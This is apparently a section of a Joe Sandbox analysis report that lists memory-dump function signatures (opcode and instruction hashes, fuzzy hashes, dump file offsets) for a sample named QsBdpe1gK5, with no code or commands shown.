                                                                                                                                        • API String ID: 0-215506332
                                                                                                                                        Strings
                                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0117895E
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                        • API String ID: 0-702105204
                                                                                                                                        • Opcode ID: 4d956ebd6fc291be4bde2aab7e52cdf6cd39e2500c04f6da7ed71901709f85d8
                                                                                                                                        • Instruction ID: 279103a2e8113acc9b0263fb6825bd3793a3543bc8e4074ce2a64aa039576bf0
                                                                                                                                        • Opcode Fuzzy Hash: 4d956ebd6fc291be4bde2aab7e52cdf6cd39e2500c04f6da7ed71901709f85d8
                                                                                                                                        • Instruction Fuzzy Hash: CD01FC35210607DBDA2C5B95D88CA567FB6EFC1668B04002DF6811A751DB206C85C793
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b152b37fc414e4692edc9a25d9ea03c11332c3e8a1bf1b7610e4a00ace0511fc
                                                                                                                                        • Instruction ID: 430328dc17d263c26befe6c27cc7c1e9900740b801fc1f953432ca6bcf9048a7
                                                                                                                                        • Opcode Fuzzy Hash: b152b37fc414e4692edc9a25d9ea03c11332c3e8a1bf1b7610e4a00ace0511fc
                                                                                                                                        • Instruction Fuzzy Hash: 7A42B371608341ABDF2DCF68C890A6FBBE5BF98704F08092DFAA297250D771D945CB52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7b75b23f726f576b61c806c17b94951f002034b1028935eee54d07561198eed1
                                                                                                                                        • Instruction ID: a637c0808b24cca025818096927a82f37366e816f2c8a2c49412dd6a277c98f0
                                                                                                                                        • Opcode Fuzzy Hash: 7b75b23f726f576b61c806c17b94951f002034b1028935eee54d07561198eed1
                                                                                                                                        • Instruction Fuzzy Hash: 52426D75E102198FEB29DF69C881BADBBF6BF48304F54C199E948EB242D7349981CF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f10081a165ce8d379991dae8232a5064d8082c58705b0a3d8e7d62315d2200ff
                                                                                                                                        • Instruction ID: ecafe1530758ae7ca6dcd96075abe49692069602cb14193baba64e8a0884eb06
                                                                                                                                        • Opcode Fuzzy Hash: f10081a165ce8d379991dae8232a5064d8082c58705b0a3d8e7d62315d2200ff
                                                                                                                                        • Instruction Fuzzy Hash: 6832ED70A00755CFEB6DCF69C8447BEBBF2AF84304F54411DD9A69B284E774A842CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e9adea96e5d2d5f13e04dba0966c16c89862c76e85fae63986f0d2ecc2769807
                                                                                                                                        • Instruction ID: 89887325e31d3d376f50b401265440854f150f6ca553e5f381b8c27f44a88a52
                                                                                                                                        • Opcode Fuzzy Hash: e9adea96e5d2d5f13e04dba0966c16c89862c76e85fae63986f0d2ecc2769807
                                                                                                                                        • Instruction Fuzzy Hash: F322F1702046618BEF2DCF2DE094376BBF1BF45304F098499DAA68F286D735E54ACB61
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9f2b339dddbc4524efdad296dbf327c49a5c58189bd496c21baef1a55ca4f28d
                                                                                                                                        • Instruction ID: 1d405e82b9781159b03096193bd3265a189cfae5fbe724360fd57cd4d8598cb3
                                                                                                                                        • Opcode Fuzzy Hash: 9f2b339dddbc4524efdad296dbf327c49a5c58189bd496c21baef1a55ca4f28d
                                                                                                                                        • Instruction Fuzzy Hash: A1328C71A04205DFDB6ACFA8C480BAEBBF1FF48310F14456DEA95AB791D735A841CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                        • Instruction ID: 7bb439b9317cf5cb9afd8812190c206832cd2b71eced0d7819aae766afbf4ad8
                                                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                        • Instruction Fuzzy Hash: 4AF17C70E0421A9BDF19CF99C580BAEFBF6BF48B14F058129E915AB748E734D841CB64
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fd965a7f69083a308982638765108812ea5155095fd7adee05af6a38f0a1ba7a
                                                                                                                                        • Instruction ID: 4d9553e9ac62b7930fafb43eff3d09602a24248153a46dafaac454ad3f303867
                                                                                                                                        • Opcode Fuzzy Hash: fd965a7f69083a308982638765108812ea5155095fd7adee05af6a38f0a1ba7a
                                                                                                                                        • Instruction Fuzzy Hash: 4DD1E171E0060A8BDF1DDFA8C841AFEB7F1AF88304F59C169D955A7281E735E9058F60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fbd83fc916be866adaab4cfd63a8e3f0e0afc2c0314ff51c94b8f22f835ba4a7
                                                                                                                                        • Instruction ID: d66c5ce7d934d9530761242a6e498e2c70cc533f7c5a6a0421eca8d91c41957e
                                                                                                                                        • Opcode Fuzzy Hash: fbd83fc916be866adaab4cfd63a8e3f0e0afc2c0314ff51c94b8f22f835ba4a7
                                                                                                                                        • Instruction Fuzzy Hash: 62E1A171608342DFC715CF28C090A6ABBE0FF89314F158AADEAD587751DB32E905CB92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0d2e7b80e13a080d15626aa5e03da60b7529928cf5dbbaba86295ab4a76a04a
                                                                                                                                        • Instruction ID: a2a073235676650075f0c7382366710d2b3a4d1842d55608136259ab7dc23a36
                                                                                                                                        • Opcode Fuzzy Hash: a0d2e7b80e13a080d15626aa5e03da60b7529928cf5dbbaba86295ab4a76a04a
                                                                                                                                        • Instruction Fuzzy Hash: 54D12371A042068FDB18DF6AC884ABEB7F5FF54704F05822EE992DB280EB30D955CB50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7008c1c82b9179ddd64f8eb370e28daed239b620a4e1b6812bdf33f5ee302dea
                                                                                                                                        • Instruction ID: 3994a3a715f94c7a06f591bb015e826f3a9df2cd86aef5a16eeb2c5d82692e60
                                                                                                                                        • Opcode Fuzzy Hash: 7008c1c82b9179ddd64f8eb370e28daed239b620a4e1b6812bdf33f5ee302dea
                                                                                                                                        • Instruction Fuzzy Hash: FD71E332200B01AFE73AEF58C844F5ABBE6FF40724F158528E6569B2A0D775E944CF50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bb850dd27ef7d99325da256c53b2d83ee5030422df4a2b6caea072e65d6d9fbd
                                                                                                                                        • Instruction ID: 2d3e6e79bf1f1e4b71746d49cb33872d8a9ac0fe01438ec53036644dd9abc632
                                                                                                                                        • Opcode Fuzzy Hash: bb850dd27ef7d99325da256c53b2d83ee5030422df4a2b6caea072e65d6d9fbd
                                                                                                                                        • Instruction Fuzzy Hash: 9D81AD72A08306CFDB68CF9CC485BADB7F1BB88714F15816EDA20AB685C7749D41CB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 765c711c22b0a3de0ab45abf6fc10e63b6a4f45b3f80687fcc3f76f8f727f3c0
                                                                                                                                        • Instruction ID: 8f9a4f1f49c311ff3965dde09dea69a38776f9c1a51daf4c05f32711ff2654bf
                                                                                                                                        • Opcode Fuzzy Hash: 765c711c22b0a3de0ab45abf6fc10e63b6a4f45b3f80687fcc3f76f8f727f3c0
                                                                                                                                        • Instruction Fuzzy Hash: C1711B71E00209AFDF1ADF94C881FEEBBB9FF54754F104129E621A7290D774AA05CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b2ef85c1fff0cc984feb3e1c6852cdaf61fe50b9e2d81d07ec3932fcc344660e
                                                                                                                                        • Instruction ID: c25fdc50877c6dc609cac4038ca60408c79a5f28c649f420d38ec117967a7bbd
                                                                                                                                        • Opcode Fuzzy Hash: b2ef85c1fff0cc984feb3e1c6852cdaf61fe50b9e2d81d07ec3932fcc344660e
                                                                                                                                        • Instruction Fuzzy Hash: 3D510272504712AFD32ADE68D844E5BBFE8EFC8714F450929BA80DB150D770ED08CBA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d480d6e8f7cbcf27eabb26dd6199cb6813a02a21ac83e4a93d1bc433816af0ca
                                                                                                                                        • Instruction ID: be8b3040244a09096558dd696a7bfbd3b2c0e87825dc4b38a3db3a53fc5a6708
                                                                                                                                        • Opcode Fuzzy Hash: d480d6e8f7cbcf27eabb26dd6199cb6813a02a21ac83e4a93d1bc433816af0ca
                                                                                                                                        • Instruction Fuzzy Hash: 6B51C170900709DFDB29DF5AC880BABFBF8BF95714F10461ED2A6976A0C7B0A545CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5ceb22f82df1c0e4e83c6d297ae7652e14862b638909c8c5cb0828f8d25b02e5
                                                                                                                                        • Instruction ID: d5c5470bae55413a0e8a3639c635df7c4984650bc338d56298870047f7b22eef
                                                                                                                                        • Opcode Fuzzy Hash: 5ceb22f82df1c0e4e83c6d297ae7652e14862b638909c8c5cb0828f8d25b02e5
                                                                                                                                        • Instruction Fuzzy Hash: 6551BC31611A15DFCB2AEFA9C980EAAB3FDFF14758F41042AE551C7260D730E951CB51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5a0e3aa5487cb7980635aac94bbaac72a3b1ae4f964c4ef93fc7c437ca213c46
                                                                                                                                        • Instruction ID: 6bd1099dc63fbb574248b3489e3b2c42852f06833612048798b88d0240689861
                                                                                                                                        • Opcode Fuzzy Hash: 5a0e3aa5487cb7980635aac94bbaac72a3b1ae4f964c4ef93fc7c437ca213c46
                                                                                                                                        • Instruction Fuzzy Hash: 1C51BC716083129FDB58CF29C981A6BB7E5FFC8608F44492DF5A5C7650E730DA06CB52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                        • Instruction ID: 96eb1bb867b4fb92d3947046ee6f16e5ef31b9e2bbfba9679032cc970e5a65a2
                                                                                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                        • Instruction Fuzzy Hash: 4551BE71E0061AAFDF19CF98C440BEEFBB6AF45B54F04406AEA10AB244D734DD44CBA4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                        • Instruction ID: 47d7f64edc2be19ed2dcd0beb3e06a1645aa69e4d35555ff6709be2ddea17295
                                                                                                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                        • Instruction Fuzzy Hash: 3951C931D0120AEFDF299B94C884BBEBFF9AF44328F154695DA1167390D7309E408BA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8ad2e8e0aade12f4b828851e62d59122d5f58e1cecb2fc67de2eb93e3d987ec7
                                                                                                                                        • Instruction ID: da049c821ed0dbbefaff61cc3e30fcb8fcdbec7d687df8bf72bb11178f545ff7
                                                                                                                                        • Opcode Fuzzy Hash: 8ad2e8e0aade12f4b828851e62d59122d5f58e1cecb2fc67de2eb93e3d987ec7
                                                                                                                                        • Instruction Fuzzy Hash: 4F41C4B07056119BDB2DDB2DC9D4BFBBB9EEF90A20F088219E95987290DB34D841C691
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b900dfb3622e4932969e2e988f30af3435ef31ddd381689dedeff2f4f6dc87fd
                                                                                                                                        • Instruction ID: 03c57697bd49c98fb4ca303544fce2fbd8b9188c1241b335d04f1b5e5356e092
                                                                                                                                        • Opcode Fuzzy Hash: b900dfb3622e4932969e2e988f30af3435ef31ddd381689dedeff2f4f6dc87fd
                                                                                                                                        • Instruction Fuzzy Hash: 20519A7190021ADFCB28DFA9C980AAEBBFAFF58358B554529D655A7300DB30AD41CFD0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                        • Instruction ID: 5f81914261bd3f1a9a809a22e86e7460d799e10b0527ee2a4273a8a96d87732d
                                                                                                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                        • Instruction Fuzzy Hash: F541FA71A007169FD72DCF28D9D4AAAB7E9FF80214B05462EE95287640EB31FD04C7D1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 13b45e00e2babbad790e3aedc7367094a83803893e72f50ef6693d2d1438a45a
                                                                                                                                        • Instruction ID: 22694ead839a1c039eb3afd45f55a9b21f16dce6ef85e2980e361b8d823a6afd
                                                                                                                                        • Opcode Fuzzy Hash: 13b45e00e2babbad790e3aedc7367094a83803893e72f50ef6693d2d1438a45a
                                                                                                                                        • Instruction Fuzzy Hash: 6341BA36A002299BDB18DF98C440AEEBBB4FF5D714F15822AF815F7240E735AC51CBA5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7f97c5a4f2658da1ea6dd07e991c24c6ebbeb82a9c8fbd4887e5b9e5f21a0ade
                                                                                                                                        • Instruction ID: 9549d2b03e7259aa80fcdecdc7602ba9df42b532000515dca641c49b4536814f
                                                                                                                                        • Opcode Fuzzy Hash: 7f97c5a4f2658da1ea6dd07e991c24c6ebbeb82a9c8fbd4887e5b9e5f21a0ade
                                                                                                                                        • Instruction Fuzzy Hash: 7D41F5716003028FDB2EDFA8C884A5BB7E5FF88228F054839E967C7255EB71E845CB51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                        • Instruction ID: 7070b547521f9b625912d4de6711f9d1390bb74248d334ba1e775edbceaba48b
                                                                                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                        • Instruction Fuzzy Hash: 3A517835A00215CFCB19CF98C580AAEF7B6FF84710F2881A9D915A7355D731AE92CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b62c2478633076eb2acc507d616645fc0e09f84cfc4cbdae0680333911ad9788
                                                                                                                                        • Instruction ID: 0a0b8334a25e242190a6e9d5c66abeeefca6e3bbf472e35255a0ab24b88539da
                                                                                                                                        • Opcode Fuzzy Hash: b62c2478633076eb2acc507d616645fc0e09f84cfc4cbdae0680333911ad9788
                                                                                                                                        • Instruction Fuzzy Hash: 9B512570900616DBDBAA8BA8CC05BE8B7F1FF15318F1482E9D669A76C1D7359981CF80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4f6d04f4c7bd43462b3c3ee12ea18a5c8c295d62fb0cdde6de025d00a3b46f61
                                                                                                                                        • Instruction ID: f8cc27d724c40fc8743927d5ac725767b2afce01f633186c5516ad9f775f6beb
                                                                                                                                        • Opcode Fuzzy Hash: 4f6d04f4c7bd43462b3c3ee12ea18a5c8c295d62fb0cdde6de025d00a3b46f61
                                                                                                                                        • Instruction Fuzzy Hash: 8141C331A012289FCB25DF68C941BEEB7B5FF44740F0100A9EA88AB246D7749E81CF91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                        • Instruction ID: b062218476c815c7e872e00ddddd5b641eac357ebea4a6d649e0f07aa67d084c
                                                                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                        • Instruction Fuzzy Hash: 6D417175B10206ABDB19DF99C8D4AEFBBBEAF88B14F144069E914E7341D770DD0187A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 553afbaf9cf6743256a1fe936283b81f46d89a1a45fa4b59c56a111132d76b28
                                                                                                                                        • Instruction ID: c7765b58de2224e5b3ba91a56c5620a66d0c6b1db1e121d3a72b3fa580c296f4
                                                                                                                                        • Opcode Fuzzy Hash: 553afbaf9cf6743256a1fe936283b81f46d89a1a45fa4b59c56a111132d76b28
                                                                                                                                        • Instruction Fuzzy Hash: F741E5706047029FE729CF28C481A26B7F6FF49314B108A6DE69787E56E731E846CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 01669f6aaeb4fdd3a826d29d9d54f5574455e2b6b7003d359281ad8f8d78c634
                                                                                                                                        • Instruction ID: b1a182ecef478210de5ad2f05822cdfd5e1db2b0c3776cd1842ad1668a7853c5
                                                                                                                                        • Opcode Fuzzy Hash: 01669f6aaeb4fdd3a826d29d9d54f5574455e2b6b7003d359281ad8f8d78c634
                                                                                                                                        • Instruction Fuzzy Hash: 6341DD32946244CFDB6DDFACE4947ADBBF0BF18724F050175D421AB689DB349940CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
